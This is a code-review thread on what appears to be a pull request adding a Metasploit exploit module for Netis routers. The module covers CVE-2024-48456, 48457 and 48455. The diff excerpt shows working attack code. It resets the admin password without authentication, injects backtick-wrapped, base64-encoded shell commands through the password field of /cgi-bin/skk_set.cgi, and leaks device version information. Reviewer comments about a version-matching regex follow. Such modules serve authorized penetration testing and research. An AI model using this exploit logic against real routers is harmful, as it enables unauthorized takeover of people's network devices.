modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb

```diff
@@ -0,0 +1,227 @@
+        'encrypt' => 4,
+        'wpaPsk' => @password,
+        'wpaPskType' => 2,
+        'wpaPskFormat' => 0,
+        'password' => @password,
+        'autoUpdate' => 0,
+        'firstSetup' => 1,
+        'quick_set' => 'ap',
+        'app' => 'wan_set_shortcut',
+        'wl_link' => 0
+      }
+    })
+    # in some cases no SUCCESS response is returned however the password has been set succesfully
+    # therefore check if the login is successfull and get the password cookie
+    print_status('Logging in with admin password to set the password cookie.')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cgi-bin/login.cgi'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'password' => @password
+      }
+    })
+    return true if res && res.code == 200 && res.body.include?('SUCCESS')
+
+    false
+  end
+
+  # CVE-2024-48456: remote code execution in the parameter password at the change admin password page at
+  # the router web interface
+  # affected components: web endpoint /cgi-bin/skk_set.cgi and binary /bin/scripts/password.sh
+  def execute_command(cmd, _opts = {})
+    # store name of payload and cleanup payload file when session is established (see def on_new_session)
+    @payload_name = cmd.split('+x')[1].strip if cmd.include?('chmod +x')
+
+    # skip last command to remove payload because it does not work
+    unless cmd.include?('rm -f')
+      payload = Base64.strict_encode64("`#{cmd}`")
+      print_status("Executing #{cmd}")
+      send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),
+        'keep_cookies' => true,
+        'vars_post' => {
+          'password' => payload,
+          'new_pwd_confirm' => payload,
+          'passwd_set' => 'passwd_set',
+          'mode_name' => 'skk_set',
+          'app' => 'passwd',
+          'wl_link' => 0
+        }
+      })
+    end
+  end
+
+  def on_new_session(_session)
+    # cleanup payload file
+    register_files_for_cleanup(@payload_name.to_s)
+    super
+  end
+
+  # CVE-2024-48455: information disclosure where an unauthenticated remote attacker can obtain sensitive information
+  # affected components: web endpoint /cgi-bin/skk_set.cgi via the mode_name and wl_link parameter
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_get.cgi'),
+      'vars_post' => {
+        'mode_name' => 'skk_get',
+        'wl_link' => 0
+      }
+    })
+    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version')
+
+    # trying to get the model and version number
+    # unfortunately JSON parsing fails for some routers, so we need to use this ugly REGEX :-(
+    version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/)
```

Comment:
```suggestion
    version = res.body.match(/(?:version).?\s*:\s*.?((\\|[^,])*)/)
```

so you can use `version[1]` everywhere instead of `version[2]` for no reasons :) 

Also, it would be nice to provide an example of what the regex is matching as a comment, as the trailing `((\\|[^,])*)` isn't super-duper-über clear. I think some parenthesis might have to be escaped as well?

Reply:
I like to include a rubular link with my regex and sample data so others can test as well

Reply:
I have included some examples in the comments.
Any suggestions for a more simple regex is of course welcome. 
And as stated before, JSON parsing fails for some of the routers because the JSON response is corrupt.